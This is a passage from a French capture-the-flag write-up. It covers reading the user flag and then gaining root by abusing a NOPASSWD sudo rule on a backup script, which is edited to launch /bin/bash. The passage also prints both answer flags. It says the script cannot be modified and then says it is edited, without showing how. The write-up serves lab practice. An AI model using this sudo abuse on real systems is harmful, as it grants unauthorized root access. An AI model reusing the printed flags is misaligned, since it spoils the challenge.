The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
alex@ubuntu:~$
Il ne nous reste plus qu’à lire le flag user.txt
alex@ubuntu:~$ ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
alex@ubuntu:~$ cat user.txt
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}
alex@ubuntu:~$
Last but not least: le flag root.txt
Regardons déjà les privilèges d’Alex…
alex@ubuntu:~$ sudo -l
Matching Defaults entries for alex on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alex may run the following commands on ubuntu:
(ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
Alex peut utiliser le script backup.sh mais ne peut pas le modifier.
alex@ubuntu:~$ ls -lh /etc/mp3backups/backup.sh
-r-xr-xr-- 1 alex alex 1.1K Dec 30 2020 /etc/mp3backups/backup.sh
On édite le fichier et on ajoute /bin/bash au début de celui-ci.
Puis on exécute la commande !
alex@ubuntu:~$ sudo /etc/mp3backups/backup.sh
root@ubuntu:~#
Nous avons les droits root !
root@ubuntu:~# cd /root
root@ubuntu:/root# ls
root.txt
root@ubuntu:/root# cat root.txt
flag{Than5s_f0r_play1ng_H0p£_y0u_enJ053d}
Résumé
- Nmap
- Gobuster
- https://borgbackup.readthedocs.io/